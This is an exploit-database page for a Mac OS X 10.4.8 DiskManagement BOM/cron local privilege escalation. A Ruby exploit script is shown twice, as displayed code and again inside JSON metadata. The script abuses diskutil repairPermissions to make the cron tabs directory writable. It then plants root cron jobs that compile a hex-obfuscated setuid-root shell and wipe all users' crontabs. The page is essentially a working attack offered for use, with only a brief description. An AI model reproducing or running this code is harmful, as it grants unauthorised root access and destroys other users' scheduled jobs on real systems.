Search...

Mac OS X 10.4.8 - DiskManagement BOM cron Privilege Escalation Exploit

2007-01-05T00:00:00

ID EDB-ID:3088
Type exploitdb
Reporter MoAB
Modified 2007-01-05T00:00:00

Description

Mac OS X 10.4.8 DiskManagement BOM (cron) Privilege Escalation Exploit. Local exploit for osx platform

                                        
                                            #!/usr/bin/ruby
# (c) 2006 LMH &lt;lmh [at] info-pull.com&gt;          (code from the other exploit, porting)
#          Kevin Finisterre &lt;kf_lists [at] digitalmunition.com&gt; (crontab rock and roll)
#
# Second exploit for MOAB-05-01-2007, uses crontab. much more simple than the other one.
# And works like a charm.

require 'fileutils'

EVIL_COMMANDS = [
		  "rm /Library/Receipts/Essentials.pkg/Contents/Archive.bom ",
		  "echo -e \"\\x6d\\x61\\x69\\x6e\\x28\\x29\\x7b\\x20\\x73\\x65\\x74\\x65\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x65\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x79\\x73\\x74\\x65\\x6d\\x28\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x20\\x2d\\x69\\x22\\x29\\x3b\\x20\\x7d\\x0a\" &gt; /tmp/finisterre.c",
		  "/usr/bin/cc -o /Users/Shared/shX /tmp/finisterre.c; rm /tmp/finisterre.c",
                  "/bin/cp -r /var/cron/tabs /Users/Shared", # I have no legit crontabs so I don't care. 
                  "/usr/bin/say Flavor Flave a k a `whoami` && sleep 5 && /usr/bin/say sleeping briefly &&  sleep 5 && chmod +s /Users/Shared/shX && sleep 5", 
		  "echo '' &gt; /tmp/pwnclean",
                  "for each in `ls /var/cron/tabs/`; do  crontab -u $each /tmp/pwnclean; done", # Sorry if you had any legit crontabs...
		  "crontab /tmp/pwnclean", # Just to make sure
		  "rm -rf /tmp/pwn*",	
                ]
TARGET_BOM_PATH = "/Library/Receipts/Essentials.pkg/Contents/Archive.bom"
SHELL_TEMPLATE  = "mkdir -p /tmp/pwndertino/var/cron/tabs\n"  +
                  "cd /tmp/pwndertino\n"                      +
                  "chmod 777 var/cron/tabs\n"                 +
                  "mkbom . /tmp/pwned.bom\n"                  +
                  "cp /tmp/pwned.bom #{TARGET_BOM_PATH}\n"    +
                  "/usr/sbin/diskutil repairPermissions /\n"

if ARGV[0] != "repair"
  # Backup if its there! Some times it is not. 
  if File.exists?(TARGET_BOM_PATH)
    FileUtils.cp(TARGET_BOM_PATH, File.join("/Users/Shared", File.basename(TARGET_BOM_PATH)))
  end
 
  puts "++ Dropping the 31337 .sh skillz"
  shell_script = File.new("moab5.sh", "w")
  shell_script.print(SHELL_TEMPLATE)

  puts "++ Fixing up crontabs"
  
  EVIL_COMMANDS.each do |cmd|
    shell_script.print("echo '* * * * * #{cmd}' &gt;&gt; /var/cron/tabs/root\n")
  end

    
  shell_script.print("echo '* * * * * /bin/rm -rf /tmp/pwned.bom /tmp/pwndertino' &gt;&gt; /tmp/pwncron\n")
  shell_script.print("crontab /tmp/pwncron\n") # You may need to sleep here
  
  shell_script.close
  puts "++ Execute moab5.sh"
  FileUtils.chmod 0755, "./moab5.sh" 
  exec "/bin/sh", "-c", "./moab5.sh"
  puts "++ Run the repair script when you are all done."
else

  # minor repair for a post-testing scenario
  if File.exists?(File.join("/Users/Shared", File.basename(TARGET_BOM_PATH)))
    FileUtils.cp(File.join("/Users/Shared", File.basename(TARGET_BOM_PATH)), TARGET_BOM_PATH) # restore backup
    FileUtils.rm_f(File.join("/Users/Shared", File.basename(TARGET_BOM_PATH)))
    exec "/usr/sbin/diskutil repairPermissions /"

  else
    exec "/usr/sbin/diskutil repairPermissions /"
  end
  
end

# milw0rm.com [2007-01-05]

JSON Vulners Source

Initial Source

{"bulletinFamily": "exploit", "id": "EDB-ID:3088", "cvelist": [], "modified": "2007-01-05T00:00:00", "lastseen": "2016-01-31T17:42:50", "edition": 1, "sourceData": "#!/usr/bin/ruby\n# (c) 2006 LMH <lmh [at] info-pull.com> (code from the other exploit, porting)\n# Kevin Finisterre <kf_lists [at] digitalmunition.com> (crontab rock and roll)\n#\n# Second exploit for MOAB-05-01-2007, uses crontab. much more simple than the other one.\n# And works like a charm.\n\nrequire 'fileutils'\n\nEVIL_COMMANDS = [\n\t\t \"rm /Library/Receipts/Essentials.pkg/Contents/Archive.bom \",\n\t\t \"echo -e \\\"\\\\x6d\\\\x61\\\\x69\\\\x6e\\\\x28\\\\x29\\\\x7b\\\\x20\\\\x73\\\\x65\\\\x74\\\\x65\\\\x75\\\\x69\\\\x64\\\\x28\\\\x30\\\\x29\\\\x3b\\\\x20\\\\x73\\\\x65\\\\x74\\\\x65\\\\x67\\\\x69\\\\x64\\\\x28\\\\x30\\\\x29\\\\x3b\\\\x20\\\\x73\\\\x65\\\\x74\\\\x75\\\\x69\\\\x64\\\\x28\\\\x30\\\\x29\\\\x3b\\\\x20\\\\x73\\\\x65\\\\x74\\\\x67\\\\x69\\\\x64\\\\x28\\\\x30\\\\x29\\\\x3b\\\\x20\\\\x73\\\\x79\\\\x73\\\\x74\\\\x65\\\\x6d\\\\x28\\\\x22\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x73\\\\x68\\\\x20\\\\x2d\\\\x69\\\\x22\\\\x29\\\\x3b\\\\x20\\\\x7d\\\\x0a\\\" > /tmp/finisterre.c\",\n\t\t \"/usr/bin/cc -o /Users/Shared/shX /tmp/finisterre.c; rm /tmp/finisterre.c\",\n \"/bin/cp -r /var/cron/tabs /Users/Shared\", # I have no legit crontabs so I don't care. \n \"/usr/bin/say Flavor Flave a k a `whoami` && sleep 5 && /usr/bin/say sleeping briefly && sleep 5 && chmod +s /Users/Shared/shX && sleep 5\", \n\t\t \"echo '' > /tmp/pwnclean\",\n \"for each in `ls /var/cron/tabs/`; do crontab -u $each /tmp/pwnclean; done\", # Sorry if you had any legit crontabs...\n\t\t \"crontab /tmp/pwnclean\", # Just to make sure\n\t\t \"rm -rf /tmp/pwn*\",\t\n ]\nTARGET_BOM_PATH = \"/Library/Receipts/Essentials.pkg/Contents/Archive.bom\"\nSHELL_TEMPLATE = \"mkdir -p /tmp/pwndertino/var/cron/tabs\\n\" +\n \"cd /tmp/pwndertino\\n\" +\n \"chmod 777 var/cron/tabs\\n\" +\n \"mkbom . /tmp/pwned.bom\\n\" +\n \"cp /tmp/pwned.bom #{TARGET_BOM_PATH}\\n\" +\n \"/usr/sbin/diskutil repairPermissions /\\n\"\n\nif ARGV[0] != \"repair\"\n # Backup if its there! Some times it is not. \n if File.exists?(TARGET_BOM_PATH)\n FileUtils.cp(TARGET_BOM_PATH, File.join(\"/Users/Shared\", File.basename(TARGET_BOM_PATH)))\n end\n \n puts \"++ Dropping the 31337 .sh skillz\"\n shell_script = File.new(\"moab5.sh\", \"w\")\n shell_script.print(SHELL_TEMPLATE)\n\n puts \"++ Fixing up crontabs\"\n \n EVIL_COMMANDS.each do |cmd|\n shell_script.print(\"echo '* * * * * #{cmd}' >> /var/cron/tabs/root\\n\")\n end\n\n \n shell_script.print(\"echo '* * * * * /bin/rm -rf /tmp/pwned.bom /tmp/pwndertino' >> /tmp/pwncron\\n\")\n shell_script.print(\"crontab /tmp/pwncron\\n\") # You may need to sleep here\n \n shell_script.close\n puts \"++ Execute moab5.sh\"\n FileUtils.chmod 0755, \"./moab5.sh\" \n exec \"/bin/sh\", \"-c\", \"./moab5.sh\"\n puts \"++ Run the repair script when you are all done.\"\nelse\n\n # minor repair for a post-testing scenario\n if File.exists?(File.join(\"/Users/Shared\", File.basename(TARGET_BOM_PATH)))\n FileUtils.cp(File.join(\"/Users/Shared\", File.basename(TARGET_BOM_PATH)), TARGET_BOM_PATH) # restore backup\n FileUtils.rm_f(File.join(\"/Users/Shared\", File.basename(TARGET_BOM_PATH)))\n exec \"/usr/sbin/diskutil repairPermissions /\"\n\n else\n exec \"/usr/sbin/diskutil repairPermissions /\"\n end\n \nend\n\n# milw0rm.com [2007-01-05]\n", "published": "2007-01-05T00:00:00", "href": "https://www.exploit-db.com/exploits/3088/", "osvdbidlist": [], "reporter": "MoAB", "hash": "cb3bbac2890df32898ed71c61edd54036d3ba9f8c2047db21fc35a22f0ba1af6", "title": "Mac OS X 10.4.8 - DiskManagement BOM cron Privilege Escalation Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Mac OS X 10.4.8 DiskManagement BOM (cron) Privilege Escalation Exploit. Local exploit for osx platform", "references": [], "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/3088/", "enchantments": {"vulnersScore": 7.2}}